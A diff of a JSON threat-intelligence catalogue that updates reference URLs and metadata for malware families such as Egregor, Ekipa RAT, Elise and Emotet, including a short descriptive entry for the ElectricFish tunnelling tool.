+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/",
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/",
+ "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/",
+ "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
+ "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/",
+ "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/",
+ "https://www.intrinsec.com/egregor-prolock/",
+ "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
+ "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/",
+ "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/",
+ "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html",
"https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf",
"https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
- "https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/",
- "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
- "https://www.group-ib.com/blog/egregor",
- "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor",
- "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
- "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia",
- "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html",
- "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/",
- "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/",
"https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/",
- "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/",
- "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/",
- "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
+ "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf",
"https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://twitter.com/redcanary/status/1334224861628039169",
- "https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/",
- "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
- "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware",
"https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
- "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
- "https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.group-ib.com/blog/egregor",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor",
+ "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
+ "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia",
+ "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/",
+ "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
+ "https://securelist.com/targeted-ransomware-encrypting-data/99255/"
],
"synonyms": [],
"type": []
@@ -21678,6 +23044,19 @@
"uuid": "257da597-7e6d-4405-9b10-b4206bb013ca",
"value": "EHDevel"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ekipa",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/malicious-macros-adapt-to-use-microsoft-publisher-to-push-ekipa-rat/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "791a0902-7541-444a-a75e-19be97545917",
+ "value": "Ekipa RAT"
+ },
{
"description": "The application is a command-line utility and its primary purpose is to tunnel traffic between two IP addresses. The application accepts command-line arguments allowing it to be configured with a destination IP address and port, a source IP address and port, a proxy IP address and port, and a user name and password, which can be utilized to authenticate with a proxy server. It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be tunneled between two machines. If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.",
"meta": {
@@ -21685,6 +23064,7 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish",
"https://www.us-cert.gov/ncas/analysis-reports/AR19-129A",
"https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
],
"synonyms": [],
@@ -21716,15 +23096,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "c0ea7b89-d246-4eb7-8de4-b4e17e135051",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9",
"value": "Elirks"
},
@@ -21733,16 +23104,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.elise",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
"https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
"https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-elgin",
- "https://www.joesecurity.org/blog/8409877569366580427",
- "https://securelist.com/blog/research/70726/the-spring-dragon-apt/",
- "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
"https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
- "https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html"
+ "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-elgin",
+ "https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html",
+ "https://securelist.com/blog/research/70726/the-spring-dragon-apt/",
+ "https://www.joesecurity.org/blog/8409877569366580427"
],
"synonyms": [
"EVILNEST"
@@ -21770,11 +23141,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer",
- "https://attack.mitre.org/software/S0064",
- "https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/",
"https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html",
"https://www.symantec.com/security-center/writeup/2015-122210-5724-99",
- "https://attack.mitre.org/groups/G0023"
+ "https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/",
+ "https://attack.mitre.org/groups/G0023",
+ "https://attack.mitre.org/software/S0064"
],
"synonyms": [
"Elmost"
@@ -21789,25 +23160,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/",
- "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/",
"http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html",
+ "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/",
"https://www.macnica.net/file/security_report_20160613.pdf",
"https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a8395aae-1496-417d-98ee-3ecbcd9a94a0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a",
"value": "Emdivi"
},
@@ -21829,292 +23191,316 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet",
- "https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques",
- "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/",
- "https://blog.lumen.com/emotet-redux/",
- "https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/",
- "https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware",
- "https://www.youtube.com/watch?v=_mGMJFNJWSk",
- "https://feodotracker.abuse.ch/?filter=version_e",
- "https://adalogics.com/blog/the-state-of-advanced-code-injections",
- "https://de.darktrace.com/blog/emotet-resurgence-cross-industry-campaign-analysis",
- "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
- "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
- "https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/",
- "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
- "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/",
- "https://www.secureworks.com/research/threat-profiles/gold-crestwood",
- "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
- "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/",
- "https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b",
- "https://blogs.vmware.com/security/2022/08/how-to-replicate-emotet-lateral-movement.html",
- "https://asec.ahnlab.com/en/33600/",
- "https://threatresearch.ext.hp.com/emotets-return-whats-different/",
- "https://forensicitguy.github.io/emotet-excel4-macro-analysis/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf",
- "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/",
- "https://unit42.paloaltonetworks.com/new-emotet-infection-method/",
- "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/",
- "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/",
- "https://twitter.com/ContiLeaks/status/1498614197202079745",
- "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/",
- "https://cert.grnet.gr/en/blog/reverse-engineering-emotet/",
- "https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams",
- "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/",
- "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/",
- "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/",
- "https://securelist.com/emotet-modules-and-recent-attacks/106290/",
- "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-again-in-recent-emotet-trojan-campaign-part-ii",
- "https://www.infosecurity-magazine.com/blogs/a-rundown-of-the-emotet-malware/",
- "https://d00rt.github.io/emotet_network_protocol/",
- "https://www.cronup.com/la-botnet-de-emotet-reinicia-ataques-en-chile-y-latinoamerica/",
- "https://blogs.vmware.com/networkvirtualization/2022/02/emotet-is-not-dead-yet-part-2.html/",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html",
- "https://github.com/cecio/EMOTET-2020-Reversing",
- "https://blogs.vmware.com/security/2022/05/emotet-moves-to-64-bit-and-updates-its-loader.html",
- "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html",
- "https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/",
- "https://www.dsih.fr/article/4483/emotet-de-retour-poc-exchange-0-day-windows-a-quelle-sauce-les-attaquants-prevoient-de-nous-manger-cette-semaine.html",
- "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment",
- "https://www.kroll.com/en/insights/publications/cyber/monitor/emotet-analysis-new-lnk-in-the-infection-chain",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.zscaler.com/blogs/security-research/return-emotet-malware",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmwcb-report-modern-bank-heists-2020.pdf",
- "https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros",
- "https://securelist.com/the-chronicles-of-emotet/99660/",
- "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
- "https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection",
- "https://team-cymru.com/blog/2021/01/27/taking-down-emotet/",
- "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
- "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/",
- "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/",
- "https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html",
- "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
- "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/",
- "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates",
- "https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html",
- "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
- "https://www.deepinstinct.com/blog/the-re-emergence-of-emotet",
- "https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html",
- "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1",
- "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
- "https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/",
- "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html",
- "https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware",
- "https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://persianov.net/emotet-malware-analysis-part-1",
- "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
- "https://twitter.com/eduardfir/status/1461856030292422659",
- "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html",
- "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/",
- "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break",
- "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/",
- "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html",
- "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html",
- "https://www.youtube.com/watch?v=_BLOmClsSpc",
- "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/",
- "https://www.bleepingcomputer.com/news/security/emotet-botnet-switches-to-64-bit-modules-increases-activity/",
- "https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html",
- "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
- "https://web.archive.org/web/20211223100528/https://cloudsek.com/emotet-2-0-everything-you-need-to-know-about-the-new-variant-of-thbanking-trojan/",
- "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/",
- "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728",
- "https://www.jpcert.or.jp/english/at/2019/at190044.html",
- "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
- "https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet",
- "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/",
- "https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf",
- "https://isc.sans.edu/diary/rss/28254",
- "https://www.youtube.com/watch?v=8PHCZdpNKrw",
- "https://www.youtube.com/watch?v=q8of74upT_g",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/",
- "https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code",
- "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes",
- "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
- "https://community.riskiq.com/article/2cd1c003",
- "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action",
- "https://cyber.wtf/2021/11/15/guess-whos-back/",
- "https://blogs.cisco.com/security/emotet-is-back",
- "https://www.hornetsecurity.com/en/security-information/emotet-is-back/",
- "https://www.ironnet.com/blog/detecting-a-mummyspider-campaign-and-emotet-infection",
- "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.youtube.com/watch?v=AkZ5TYBqcU4",
- "https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
- "https://twitter.com/Cryptolaemus1/status/1516535343281025032",
- "https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/",
- "https://pl-v.github.io/plv/posts/Emotet-unpacking/",
- "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/",
- "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf",
- "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html",
- "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return",
- "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
- "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/",
- "https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/",
- "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
- "https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html",
- "https://unit42.paloaltonetworks.com/c2-traffic/",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet",
- "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/",
- "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/",
- "https://notes.netbytesec.com/2021/02/deobfuscating-emotet-macro-and.html",
- "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/",
- "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled",
- "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/",
- "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/",
- "https://www.inde.nz/blog/analysis-of-the-latest-wave-of-emotet-malicious-documents",
- "https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack",
- "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
- "https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware",
+ "https://blogs.vmware.com/security/2022/05/emotet-config-redux.html",
"https://www.anomali.com/blog/mummy-spiders-emotet-malware-is-back-after-a-year-hiatus-wizard-spiders-trickbot-observed-in-its-return",
- "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69",
- "https://www.digitalshadows.com/blog-and-research/emotet-disruption/",
- "https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/",
- "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus",
- "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/",
+ "https://www.youtube.com/watch?v=q8of74upT_g",
+ "https://www.vmware.com/content/dam/learn/en/amer/fy23/pdf/1669005_Emotet_Exposed_A_Look_Inside_the_Cybercriminal_Supply_Chain.pdf",
+ "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/",
+ "https://www.esentire.com/security-advisories/emotet-activity-identified",
+ "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html",
+ "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage",
+ "https://unit42.paloaltonetworks.com/c2-traffic/",
+ "https://blogs.vmware.com/security/2022/08/how-to-replicate-emotet-lateral-movement.html",
+ "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html",
